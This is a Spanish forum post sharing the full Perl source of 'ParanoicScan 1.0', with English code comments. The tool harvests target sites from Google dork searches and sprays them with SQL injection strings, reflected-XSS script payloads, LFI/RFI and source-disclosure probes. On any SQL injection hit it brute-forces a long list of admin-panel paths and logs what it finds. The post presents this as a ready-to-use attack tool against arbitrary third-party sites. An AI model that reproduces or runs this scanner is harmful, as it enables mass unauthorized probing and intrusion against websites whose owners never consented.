[Perl] ParanoicScan 1.0

Iniciado por BigBear, 3 Diciembre 2011, 16:32 PM



Lo mismo que la anterior versión, solo se le agregó
un buscador de paneladmin y una nueva opción para buscar listados de directorios en las páginas que estamos escaneando.


#!usr/bin/perl
#Paranoic Scan 1.0 Updated
#(c)0ded by Doddy H 2011
#
#Search in google with a dork
#Scan type :
#
#XSS
#Full Source Disclosure
#LFI
#RFI
#SQL GET & POST + admin
#Directory listing
#MSSQL
#Oracle
#Jet Database
#Find HTTP Options and Server name
#
#

use LWP::UserAgent;
use HTML::LinkExtor;
use HTML::Form;
use URI::Split qw(uri_split);
use IO::Socket;


# Relative paths that sqladmin() requests under http://HOST/ once a page has
# tested positive for SQL injection; any 2xx response (is_success) is written
# to logs/admin-logs.txt.
my @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');

# Shared HTTP client used by every probe: a browser-like User-Agent string
# and a 5-second timeout per request.
my $nave = LWP::UserAgent->new(
    agent   => "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12",
    timeout => 5,
);

installer();   # create logs/ (where savefile() appends results) if it is missing

sta();         # enter the interactive menu; menu/scan/finish loop back into sta()

sub sta {
# Entry point of the interactive loop. In Perl a named sub nested inside
# another sub is still an ordinary package-level sub, so head(), menu() and
# scan() below are globally callable; sta() itself only runs &menu.
sub head {
# Clear the console ('cls' is the Windows command) and print the banner.
system 'cls';
print qq(


@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
@  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
@  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
@@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
@    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
@    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @




);
}
# '&menu;' (no parentheses) calls menu() with the current @_.
&menu;
sub menu {
# Main menu. [a] reads target URLs from a wordlist file, [b] collects them
# from a Google search; any other input redraws the menu by recursion.
&head;
print "[a] : Scan a File\n";
print "[b] : Search in google and scan the webs\n\n";
print "[option] : ";
chomp(my $op = <STDIN>);
if ($op =~/a/ig) {
print "\n[+] Wordlist : ";
chomp(my $word = <STDIN>);
# savewords() reads the file, cortar() strips parameter values, repes() de-duplicates.
my @paginas = repes(cortar(savewords($word)));
my $option = &men;
print "\n\n[+] Opening File\n";
scan($option,@paginas);
}
elsif ($op=~/b/ig) {
print "\n[+] Dork : ";
chomp(my $dork = <STDIN>);
print "[+] Pages : ";
chomp(my $pag = <STDIN>);
my $option = &men;
print "\n\n[+] Searching in google\n";
my @paginas = &google($dork,$pag);
scan($option,@paginas);
}
else {
&menu;
}
}
sub scan {
# Dispatcher: for the URLs in @webs, runs the probes whose letter(s) appear
# in $option (matched case-insensitively; men() lists the letters).
# 'A' runs the set below except sql() [K], sqladmin() [Q] and simple() [Y].
my ($option,@webs) = @_;
print "\n\n[Status] : Scanning\n";
print "[Webs Count] : ".int(@webs)."\n\n";
for(@webs) {
if ($option=~/S/ig) {
scansql($_);
}
if ($option=~/K/ig) {
sql($_);
}
if ($option=~/Q/ig) {
sqladmin($_);
}
if ($option=~/Y/ig) {
simple($_);
}
if ($option=~/L/ig) {
lfi($_);
}
if ($option=~/R/ig) {
rfi($_);
}
if ($option=~/F/ig) {
fsd($_);
}
if ($option=~/X/ig) {
scanxss($_);
}
if ($option=~/M/ig) {
mssql($_);
}
if ($option=~/J/ig) {
access($_);
}
if ($option=~/O/ig) {
oracle($_);
}
if ($option=~/HT/ig) {
http($_);
}
# "All": every probe that needs no extra input.
if ($option=~/A/ig) {
scansql($_);
scanxss($_);
mssql($_);
access($_);
oracle($_);
lfi($_);
rfi($_);
fsd($_);
http($_);
}
}
}
print "\n\n[Status] : Finish\n";
&finish;
}

sub toma {
    # GET the given URL with the shared $nave agent and return only the body.
    my ($url) = @_;
    my $response = $nave->get($url);
    return $response->content;
}

sub tomaz {
    # GET the given URL with the shared $nave agent and return the whole
    # HTTP::Response object (callers inspect is_success).
    my ($url) = @_;
    return $nave->get($url);
}

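sub savefile {
    # Append one line to logs/NAME.
    #   $_[0]  file name inside the logs/ directory
    #   $_[1]  text to append; a newline is added
    # Three-argument open with a lexical handle. The original used a
    # two-argument open on a concatenated string and never checked it, so a
    # missing logs/ directory silently dropped every log line.
    my ($name, $line) = @_;
    my $path = "logs/" . $name;
    open my $fh, '>>', $path or do {
        warn "open $path: $!";
        return;
    };
    print {$fh} $line . "\n";
    # Buffered write errors surface at close, so check it too.
    close $fh or warn "close $path: $!";
    return;
}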

sub finish {
    # Closing credit line; wait for Enter, then go back to the main menu.
    print "\n\n\n(C) Doddy Hackman 2010\n\n";
    my $enter = <STDIN>;
    return sta();
}

sub google {
# Collect result URLs for a search term ($a) from google.com.ar, stepping
# start= by 10 up to $b (start=0 is never requested), keeping the webcache
# links and pulling the cached target out of "cache:<id>:<url>+".
# $pages, $code, @url and @founds are package globals, so results
# accumulate across calls.  The lexical $a/$b shadow sort's package variables.
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}

for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

# The right-hand @founds is still the package global: the lexical declared
# by this 'my' is not in scope until the next statement.
my @founds = repes(cortar(@founds));
return @founds;
}

sub sql {
# Single GET-based SQL check: appends "-1+union+select+666--" to the URL and
# logs the page when MySQL's column-count error text comes back.
# $code1 is a package global.
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
savefile("sql-logs.txt",$page);
}}

sub sqladmin {
# Same GET-based check as sql(); on a hit, additionally requests every path in
# @panels under http://HOST/ and logs those that answer 2xx (is_success) to
# admin-logs.txt.  $code1 and $code are package globals.
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "\n[+] SQLI : $page\a\n";
savefile("sql-logs.txt",$page);

my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);

# Scheme is fixed to http:// regardless of the original URL's scheme.
my $fage = "http://".$auth;

# Reuses the lexical $path from uri_split as the loop variable (foreach aliases it).
for $path(@panels) {
$code = tomaz($fage."/".$path);
if ($code->is_success) {
print "[+] Link : ".$fage."/".$path."\n";
savefile("admin-logs.txt",$fage."/".$path);
}}}}

sub http {
# Server fingerprint: opens a raw TCP connection to HOST:80, sends a bare
# HTTP/1.0 OPTIONS request (no Host header), reads up to 1000 bytes and
# records the Server: and Allow: header values in http-logs.txt.  Nothing is
# printed to the screen.  $resultado is a package global.

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);

# Constructor result is not checked before use.
my $socket = IO::Socket::INET->new(
PeerAddr=>$auth,
PeerPort=>"80",
Proto=>"tcp");

print $socket "OPTIONS  / HTTP/1.0\r\n\r\n";
read $socket,$resultado,"1000";

if ($resultado=~/Server:(.*)/g) {
my $server = $1;

savefile("http-logs.txt","[+] Page : $auth"."\n");
savefile("http-logs.txt","[+] Server : ".$server."\n");
}
if ($resultado=~/Allow: (.*)/g) {
my $options = $1;
savefile("http-logs.txt","[+] Options : ".$options."\n");
}
$socket->close;
}

sub scanxss {
# Reflected-XSS probe for one page: parses its HTML forms, submits each form
# with every non-submit field set to a test string, and records the form when
# that string comes back verbatim in the response.  The arrays declared below
# are per page, not per form, so they accumulate across a page's forms.

my $page = shift;
chomp $page;

# HTML::Form->parse(html, base): every form on the page, base URL "/".
my @testar = HTML::Form->parse(toma($page),"/");
my @botones_names;   # names of submit inputs seen so far
my @botones_values;  # their values, intended to be parallel to @botones_names
my @orden;           # unused: the GET branch uses the scalar $orden, a package global
# Two test strings: one bare, one that first closes a quoted attribute.
my @pa = ("<script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>",'"><script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>');
my @get_founds;      # URLs whose GET response echoed a test string
my @post_founds;     # form names/positions whose POST response echoed one
my @ordenuno;        # name/value pairs for the first test string (POST body)
my @ordendos;        # name/value pairs for the second test string (POST body)

my $contador_forms = 0;   # 1-based position of the current form on the page

# Placeholder written into GET queries and later swapped for a test string.
my $valor = "doddyhackman";

for my $test(@testar) {
$contador_forms++;
if ($test->method eq "POST") {
my @inputs = $test->inputs;
for my $in(@inputs) {
if ($in->type eq "submit") {
# An unnamed submit pushes "submit" AND its empty real name, so
# @botones_names gains two entries for a single value.
if ($in->name eq "") {
push(@botones_names,"submit");
}
push(@botones_names,$in->name);
push(@botones_values,$in->value);
} else {
push(@ordenuno,$in->name,$pa[0]);
push(@ordendos,$in->name,$pa[1]);
}}

# One POST per collected submit button, once with each test-string variant.
for my $n(0..int(@botones_names)-1) {
my @preuno = @ordenuno;
my @predos = @ordendos;
push(@preuno,$botones_names[$n],$botones_values[$n]);
push(@predos,$botones_names[$n],$botones_values[$n]);

my $codeuno = $nave->post($page,\@preuno)->content;
my $codedos = $nave->post($page,\@predos)->content;
# Echoed back unchanged?  Record the form's name, or its position when unnamed.
if ($codeuno=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig or
$codedos=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig) {
if ($test->attr(name) eq "" or $test->attr(name) eq " ") {
push(@post_founds,$contador_forms);
} else {
push(@post_founds,$test->attr(name));
}}}
} else { # end of the POST branch; GET forms follow
my @inputs = $test->inputs;
for my $in(@inputs) {
if ($in->type eq "submit") {
if ($in->name eq "") {
push(@botones_names,"submit");
}
push(@botones_names,$in->name);
push(@botones_values,$in->value);
} else {
# Build "name=placeholder&name=placeholder&..." in the global $orden.
$orden.=''.$in->name.'='.$valor.'&';
}}
# Drop the trailing '&'.
chop($orden);
for my $n(0..int(@botones_names)-1) {
my $partedos = "&".$botones_names[$n]."=".$botones_values[$n];
my $final = $orden.$partedos;
for my $strin(@pa) {
chomp $strin;
# In place: each pass replaces the first remaining placeholder in $final.
$final=~s/doddyhackman/$strin/;
$code = toma($page."?".$final);
# Quote the test string so it is matched literally, not as a regex.
my $strin = "\Q$strin\E";
if ($code=~/$strin/) {
push(@get_founds,$page."?".$final);
}}}}}

# Report GET hits (de-duplicated) to screen and xss-logs.txt.
my @get_founds = repes(@get_founds);
if (int(@get_founds) ne 0) {
for(@get_founds) {
savefile("xss-logs.txt","[+] XSS Found : $_");
print "[+] XSS Found : $_\n\a";
}}

# Report POST hits; only purely numeric entries (form positions) pass the
# filter, so forms that were recorded by name are not printed.
my @post_founds = repes(@post_founds);
if (int(@post_founds) ne 0) {
for my $t(@post_founds) {
if ($t =~/^\d+$/) {
savefile("xss-logs.txt","[+] XSS : Form $t in $page");
print "[+] XSS : Form $t in $page\n\a";
}}}}


sub simple {
# Directory-listing probe: fetches the page, takes every link it contains,
# and for each link's parent directory requests http://AUTH/DIR and looks for
# an "Index of" title in the body.  $repetidos is a package global holding a
# space-separated list of directories already probed, across all calls.

my $code  = toma($_[0]);
my @links = get_links($code);

for my $com (@links) {
my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
if ( $path =~ /\/(.*)$/ ) {
my $path1 = $1;
# $_[0] aliases the caller's variable (an element of @webs in scan()), so
# this strips the last path segment from the caller's URL in place;
# $path1 is interpolated into the pattern unescaped.
$_[0] =~ s/$path1//ig;
my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
if ( $path =~ /(.*)\// ) {
my $parche = $1;                                 
# Substring test against the accumulated list of probed directories.
unless($repetidos=~/$parche/){
$repetidos.=" ".$parche;
# NOTE(review): $auth comes from the link itself; for a relative link it is
# empty and the URL built here has no host - confirm against real pages.
my $code=toma("http://".$auth.$parche);     
if ($code =~ /Index of (.*)</ig ) {
my $dir_found = $1;
chomp $dir_found;
print "[+] Directory Found : "."http://".$auth.$parche."\n";
savefile("dir-logs.txt","[+] Directory Found : "."http://".$auth.$parche);
}}}}}}

sub scansql {
# MySQL error-based probe.  First appends a single quote to the URL and looks
# for MySQL/PHP error text in the response.  If that finds nothing and the URL
# has a query string, the page (minus the query) is fetched and each POST form
# is submitted with a single quote in every non-submit field.
# $co is a package global.

my $page = shift;
my $copia = $page;   # unused copy of the URL

$co = toma($page."'");

# Error signatures; mysql_free_result and mysql_fetch_assoc are listed twice.
if ($co=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $co=~ /mysql_free_result/ig || $co =~ /mysql_fetch_assoc/ig ||$co =~ /mysql_num_rows/ig || $co =~ /mysql_fetch_array/ig || $co =~/mysql_fetch_assoc/ig || $co=~/mysql_query/ig || $co=~/mysql_free_result/ig || $co=~/equivocado en su sintax/ig || $co=~/You have an error in your SQL syntax/ig || $co=~/Call to undefined function/ig) {
savefile("sql-logs.txt","[+] SQL : $page");
print "[+] SQLI : $page\a\n";
} else {

# Keep only the part before '?'; this inner $page shadows the outer one.
if ($page=~/(.*)\?(.*)/) {
my $page = $1;

my @testar = HTML::Form->parse(toma($page),"/");
my @botones_names;    # submit-input names, accumulated across this page's forms
my @botones_values;   # their values, intended to be parallel to @botones_names
my @orden;            # unused
my @get_founds;       # unused
my @post_founds;      # form names/positions whose POST produced an error
my @ordenuno;         # name/value pairs for the POST body, accumulated across forms
my @ordendos;         # unused

my $contador_forms = 0;   # 1-based position of the current form

my $valor = "doddyhackman";   # unused in this sub

for my $test(@testar) {
$contador_forms++;
if ($test->method eq "POST") {
my @inputs = $test->inputs;
for my $in(@inputs) {
if ($in->type eq "submit") {
# An unnamed submit pushes "submit" AND its empty real name (two entries, one value).
if ($in->name eq "") {
push(@botones_names,"submit");
}
push(@botones_names,$in->name);
push(@botones_values,$in->value);
} else {
push(@ordenuno,$in->name,"'");
}}

# One POST per collected submit button.
for my $n(0..int(@botones_names)-1) {
my @preuno = @ordenuno;
push(@preuno,$botones_names[$n],$botones_values[$n]);
my $code = $nave->post($page,\@preuno)->content;
if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
# Record the form's name, or its position when it has none.
if ($test->attr(name) eq "" or $test->attr(name) eq " ") {
push(@post_founds,$contador_forms);
} else {
push(@post_founds,$test->attr(name));
}}}}

# Only purely numeric entries (form positions) are reported; named forms are not.
my @post_founds = repes(@post_founds);
if (int(@post_founds) ne 0) {
for my $t(@post_founds) {
if ($t =~/^\d+$/) {
savefile("sql-logs.txt","[+] SQLI : Form $t in $page");
print "[+] SQLI : Form $t in $page\n\a";
}}}}}}}

sub access {
# Microsoft Access / Jet probe: appends a single quote to the URL and looks
# for Jet or Access ODBC driver error text; hits go to jetdb-logs.txt.
# $code1 is a package global.

my $page = shift;
$code1 = toma($page."'");
if ($code1=~/Microsoft JET Database/ig or $code1=~/ODBC Microsoft Access Driver/ig) {
print "[+] Jet DB : $page\a\n";
savefile("jetdb-logs.txt",$page);
}
}

sub mssql {
# MSSQL probe: appends a single quote to the URL and looks for the SQL Server
# ODBC driver error text; hits go to mssql-logs.txt.  $code1 is a package global.

my $page = shift;
$code1 = toma($page."'");
if ($code1=~/ODBC SQL Server Driver/ig) {
print "[+] MSSQL : $page\a\n";
savefile("mssql-logs.txt",$page);
}
}

sub oracle {
# Oracle probe: appends a single quote to the URL and looks for the OLE DB
# Provider for Oracle error text; hits go to oracle-logs.txt.
# $code1 is a package global.

my $page = shift;
$code1 = toma($page."'");
if ($code1=~/Microsoft OLE DB Provider for Oracle/ig) {
print "[+] Oracle : $page\a\n";
savefile("oracle-logs.txt",$page);
}
}

sub rfi {
# Remote-file-inclusion probe: appends a third-party URL (note the single
# slash after "http:") to the page URL and checks whether that site's title
# text appears in the response; hits go to rfi-logs.txt.  $code1 is a package global.
my $page = shift;
$code1 = toma($page."http:/www.supertangas.com/");
if ($code1=~/Los mejores TANGAS de la red/ig) { # This is real knowledge xDDD
print "[+] RFI : $page\a\n";
savefile("rfi-logs.txt",$page);
}}

sub lfi {
# Local-file-inclusion probe: appends a single quote to the URL and looks for
# PHP's "No such file or directory in <b>...</b> on line" warning; hits go to
# lfi-logs.txt.  $code1 is a package global.
my $page = shift;
$code1 = toma($page."'");
if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print "[+] LFI : $page\a\n";
savefile("lfi-logs.txt",$page);
}}

sub fsd {
# Full-source-disclosure probe: appends the URL's final path segment to the
# URL itself and looks for a PHP header() call setting
# "Content-Disposition: attachment" in the body.  Hits are written to
# fpd-logs.txt (note the file name).  $code1 is a package global.
my $page = shift;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) {
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
print "[+] Full Source Discloure : $page\a\n";
savefile("fpd-logs.txt",$page);
}}}

sub repes {
    # Order-preserving de-duplication of the argument list.  %repe is a
    # package global shared by every call, so an element already returned by
    # an earlier call is filtered out here as well.
    return grep { !$repe{$_}++ } @_;
}

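sub savewords {
    # Return the lines of the wordlist file $_[0], as read (no chomp).
    # Three-argument read-only open: the two-argument form treated leading
    # characters such as '|' or '>' in the user-typed filename as an open
    # mode.  The original also pushed onto a package-global @r, so a second
    # call returned the previous file's lines as well; the list is now lexical.
    my ($file) = @_;
    open my $fh, '<', $file or do {
        warn "open $file: $!";
        return;
    };
    my @lines = <$fh>;
    close $fh;
    return @lines;
}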

sub men {
    # Print the scan-type menu and return the letters the user typed
    # (chomped, otherwise unvalidated); scan() matches on them.
    my @scan_types = (
        [ 'X',  'XSS' ],
        [ 'S',  'SQL GET/POST' ],
        [ 'K',  'SQL GET' ],
        [ 'Q',  'SQL GET + Admin' ],
        [ 'Y',  'Directory listing' ],
        [ 'M',  'MSSQL' ],
        [ 'J',  'Jet Database' ],
        [ 'O',  'Oracle' ],
        [ 'L',  'LFI' ],
        [ 'R',  'RFI' ],
        [ 'F',  'Full Source Discloure' ],
        [ 'HT', 'HTTP Information' ],
        [ 'A',  'All' ],
    );
    print "\n\n[+] Scan Type : \n\n";
    print "[$_->[0]] : $_->[1]\n" for @scan_types;
    print "\n\n[Options] : ";
    chomp(my $option = <STDIN>);
    return $option;
}

sub cortar {
    # For each entry containing '=', keep only the text up to and including
    # the first '=' (i.e. the leading parameter name, value stripped);
    # entries without '=' pass through unchanged.
    my @trimmed;
    for my $entry (@_) {
        if ($entry =~ /=/) {
            my ($head) = split /=/, $entry, 2;
            push @trimmed, "$head=";
        }
        else {
            push @trimmed, $entry;
        }
    }
    return @trimmed;
}

sub get_links {
# Return every attribute value HTML::LinkExtor reports for the links in the
# given HTML (href, src and similar).  $test and @links are package globals;
# @links is never cleared here, so it also carries values from earlier calls.

$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;

# LinkExtor callback, called as ($tag, %attr): keep all attribute values,
# ignore the tag name.
sub agarrar {
my ($a,%b) = @_;
push(@links,values %b);
}
}


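sub installer {
    # Create the logs/ directory that savefile() appends to, if it is missing.
    # The original passed the mode as the string "777", which Perl reads as
    # decimal 777 (octal 01411), not 0777.  The logs belong to the user
    # running the script, so 0700 is sufficient; mkdir failure is reported
    # instead of ignored.
    return if -d "logs/";
    mkdir "logs/", 0700 or warn "mkdir logs/: $!";
    return;
}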

# ¿ The End ?